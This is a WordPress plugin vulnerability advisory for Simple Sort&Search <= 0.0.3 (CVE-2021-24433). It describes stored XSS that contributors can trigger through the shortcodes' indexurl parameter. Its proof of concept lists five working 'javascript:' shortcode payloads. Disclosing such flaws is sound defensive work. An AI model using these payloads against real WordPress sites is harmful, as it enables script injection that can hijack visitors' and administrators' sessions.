WordPress Plugin Vulnerabilities

Simple Sort&Search <= 0.0.3 - Ccontributor+ Stored XSS

Description

The plugin does not make sure that the indexurl parameter of the shortcodes "category_sims", "order_sims", "orderby_sims", "period_sims", and "tag_sims" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor

Proof of Concept

As a contributor, add one of the shortcode below to a post or page, then view it and change the state of the input/s generated (such as tick a checkbox, or select a different option etc) to trigger the XSS

[category_sims type="checkbox" indexurl="javascript:alert(origin)//"]
[order_sims indexurl="javascript:alert(origin)//"]
[orderby_sims indexurl="javascript:alert(origin)//"]
[period_sims indexurl="javascript:alert(origin)//"]
[tag_sims type="checkbox" indexurl="javascript:alert(origin)//"]

Affects Plugins

Plugin icon
simple-sortsearch
No known fix

References

CVE
CVE-2021-24433

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.8 (medium)

Miscellaneous

Submitter
apple502j
Verified
Yes
WPVDB ID
2ce8c786-ba82-427c-b5e7-e3b300a24c5f

Timeline

Publicly Published
2021-06-21 (about 2 years ago)
Added
2021-06-21 (about 2 years ago)
Last Updated
2021-06-25 (about 2 years ago)

Other

Published
Title
Published
2019-12-26
Title
WP Accessibility < 1.7.0 - Minor Authenticated Stored XSS in custom CSS
Published
2024-04-18
Title
LearnPress – WordPress LMS Plugin < 4.2.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2021-11-29
Title
Buttonizer - Smart Floating Action Button < 2.5.5 - Admin+ Stored Cross-Site Scripting
Published
2024-04-11
Title
Shopkeeper Extender <= 3.5 - Contributor+ Stored XSS
Published
2024-04-12
Title
Remove Footer Credit < 1.0.14 - Authenticated (Administrator+) Stored Cross-Site Scripting